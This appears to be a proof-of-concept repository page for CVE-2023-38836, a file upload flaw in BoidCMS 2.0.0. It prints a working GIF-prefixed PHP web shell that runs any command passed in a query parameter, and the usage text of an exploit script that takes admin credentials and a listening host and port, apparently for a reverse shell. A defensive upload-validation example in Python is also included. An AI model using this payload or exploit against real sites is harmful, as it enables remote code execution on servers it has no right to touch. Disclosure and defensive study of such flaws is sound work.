CVE-2023-38836 PoC — BoidCMS Code Issue Vulnerability

Source
Associated Vulnerability
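Title: BoidCMS Code Issue Vulnerability (CVE-2023-38836)
Description: BoidCMS is a free, open-source flat-file CMS for building simple websites and blogs, developed in PHP and using JSON as its database. BoidCMS v.2.0.0 contains a code issue vulnerability that allows a remote attacker to execute arbitrary code via the GIF header component.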
Description
Exploit for file upload vulnerability in BoidCMS version <=2.0.0
Readme
# CVE-2023-38836 Exploit
A file upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file of a dangerous type (CWE-434).

To exploit it, an attacker can add a GIF header to the file so that it passes the MIME type check.
```php
GIF89a;
<?php system($_GET["cmd"]); ?>
```
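
The check below is an added example, not code from this PoC or from BoidCMS. It contrasts a magic-byte-only test (an assumed model of the MIME check being bypassed) with an upload validation that also enforces an extension allowlist and scans the body for PHP open tags. The function names, allowlist and sample bytes are constructed for illustration.

```python
import os

# Assumed policy for this example: allowed extension -> expected leading bytes.
# This is not BoidCMS's actual configuration.
ALLOWED_EXT = {
    ".gif": b"GIF8",
    ".png": b"\x89PNG",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# Heuristic markers; a short marker can also occur by chance in binary data.
PHP_MARKERS = (b"<?php", b"<?=")


def weak_magic_check(data: bytes) -> bool:
    """Models a MIME check that trusts only the leading magic bytes."""
    return data.startswith((b"GIF87a", b"GIF89a"))


def upload_findings(filename: str, data: bytes) -> list[str]:
    """Return reasons to reject an upload; an empty list means accept."""
    findings = []
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED_EXT.get(ext)
    if magic is None:
        findings.append(f"extension {ext or '(none)'} not in allowlist")
    elif not data.startswith(magic):
        findings.append("content does not match extension")
    if any(marker in data for marker in PHP_MARKERS):
        findings.append("PHP open tag in file body")
    return findings


# Constructed samples: a GIF header followed by a harmless PHP body,
# and a minimal 1x1 GIF image.
POLYGLOT = b"GIF89a;\n<?php echo 1; ?>"
REAL_GIF = bytes.fromhex(
    "474946383961 01000100800000 000000ffffff 21f9040100000000"
    " 2c000000000100010000 0202440100 3b"
)

if __name__ == "__main__":
    for name, blob in [("upload.php", POLYGLOT), ("avatar.gif", POLYGLOT),
                       ("avatar.gif", REAL_GIF)]:
        print(name, weak_magic_check(blob), upload_findings(name, blob))
```

Content checks like these are heuristics; storing uploads under server-generated names and serving the upload directory with script execution disabled addresses the same weakness independently.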

## Usage
```
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port
```

![](img.png)
File Snapshot

```
[4.0K] /data/pocs/8dfe966cb933a91a54082a88bc284a008e3b591a
├── [2.3K] CVE-2023-38836.py
├── [ 83K] img.png
├── [ 34K] LICENSE
└── [ 764] README.md

0 directories, 4 files
```